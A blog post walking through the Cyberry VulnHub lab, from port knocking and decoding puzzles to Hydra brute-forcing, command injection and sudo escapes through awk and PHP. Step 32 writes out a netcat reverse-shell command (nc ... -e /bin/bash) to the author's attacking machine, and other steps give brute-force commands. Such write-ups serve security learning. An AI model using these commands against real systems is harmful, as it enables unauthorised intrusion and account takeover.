Saturday, 16 February 2019


Solve the Cyberry Vulnhub in 36 Steps


This article is going to walk through the step I used to solve the Cyberry vulnerable VMs that can be download at the https://www.vulnhub.com/entry/cyberry-1,217/

Tools used on this game
  • Kali 64bits (192.168.187.135)
  • netdiscover
  • NMAP
  • Python
  • Knock
  • Nikto
  • Hydra
  • Netcat
  • crunch 

1) Downloaded the Cyberry at VulnHub to start the game using any VM client.  The VMware Workstation  15 was used for this walk through.



2)  First of all, we need to find out the target Cyberry machine address, we can use a Linux commend netdiscover



or using another Linux commend nmap -sn 192.168.187.1/24 



3) Got the basic information about the server using nmap -sV 192.168.187.129

4) An Apache webserver was found and visited this web site



5) Viewed the source code and find base64 encode text, tried to decode it but nothing to see

   decode the text using Linux commend 



 decode the 10101  using the following script and found that a image file boss.gif, but nothing inside.






6) Quick checked any vulnerability in the site by using nikto
     
     A login page was found , but, SQL injection or other injection technique cannot apply to this login page



7) View the source code of this login page and see and another page in the website 

     Visit the http://192.168.187.129/berrypedia.html


8) View the source view-source: http://192.168.187.129/berrypedia.html  and a image file name  is some different placeho1der.jpg








Download the image 



9) Don’t know how to do it on this image
Google the solution
After googled, these four guys are famous singers in US, they all sang the same song “I hear you knocking” and the release date of the song are 1970 1955 1955 1961. 

It may be the Port Knock applied on the server

10) Install the Knock apt-get install knockd and try to knock the port




11) Scanned all port of the target machine by using nmap -p – again after knock, alternatively, other than using "knock" command,  a simple python program prepared for knocking the port



or using the knock Linux command as below, if you cannot unknock the port, restart the Cyberry 


A new high port was found 61955

12) Assessed the “new” found website and search anything inside

13) Get some idea here http://192.168.187.129:61955/H, we open it and find brain-fuck encoded strings

14) This is brainfuck encoded text, using online decoder to decode it such as https://www.dcode.fr/brainfuck-language and the result was 


team members
chuck
halle
nick
terry
mary
kerry

pw: bakeoff

15) Using this information to logon the previous found the login page, but did not work. 


16) Try to login with FTP or SSH as the port was open, using Hydra to try 

17) FTP using "mary" account 


18) After login using marry account, reminder.enc file was found which was protected by openssl with salt password. On the same time, the .trash file contained some common password "marry" used

19) try to unlocked the .reminder.enc file 
for i in $(openssl enc -ciphers | tail -n +2);
                do for j in $(cat opensslPass.txt);
                                do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "dec$i$j" -k $j;
                done;
done 2>/dev/null

20) Got the file, as one of the decrypted file return in ASCII format


21) Try to using this login on previous found page, after several try the credential was [mary:dangleberry69]


22) Find a page on visiting the "ub3r-s3cur3 section" link which look have a command injection loophole

23) Tried to do the commend injection using brute, start the netcat server at my Kali. 
 Finally the remote shell connection established.

24) Using python to gain the reverse shell import pty;pty.spawn("/bin/bash")'

25) check the available file in the directory and found there was a readable file

26)User Python SHH Brute Forcer and using this password file with the user list pervious found.
https://github.com/R4stl1n/SSH-Brute-Forcer

python SSHBruteForce.py -i 192.168.187.129 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30

Or we can use hyrda 
hydra -L user.txt -P password.txt -f ssh://192.168.187.129

27) SSH to the target using "nick" and go around on his home directory, found that the invoke.sh cannot be access, but it can be sudo to terry to access.


28) Try to sudo Terry account to access the invoke.sh

29) read the invoke.sh now, but nothing special inside. Try again any other account can be sudo


 30) halle can be sudo on awk, let try to escape the shell -> sudo 0 u halle awk 'BEGIN { system("/bin/sh") }'"/bin/sh")}'




31) Check the sudo list again and found user “chuck”

32) PHP can also be escaped.......

Setup the netcat channel at my kali
Run shell script 

sudo -u chuck /usr/bin/php -r 'shell_exec("/bin/nc 192.168.187.136 443 -e /bin/bash");'
Got the shell
sudo -l  does not work this time


33)  Check home directory of chuck
Found a email, the answer was there....... 

34) Started at “che”, end with “rry”, “baca” in between and the total length of the password was 15. Using the crunch to generate all possible value
 35) Using Hydra again to check the root password
 36) I got it


The Answer.....

No comments:

Post a comment

Calvin Work A) My Study Plan B) My CTF Record C) My Python Code-  github    1) Crypto    2) Crunch in python (generate d...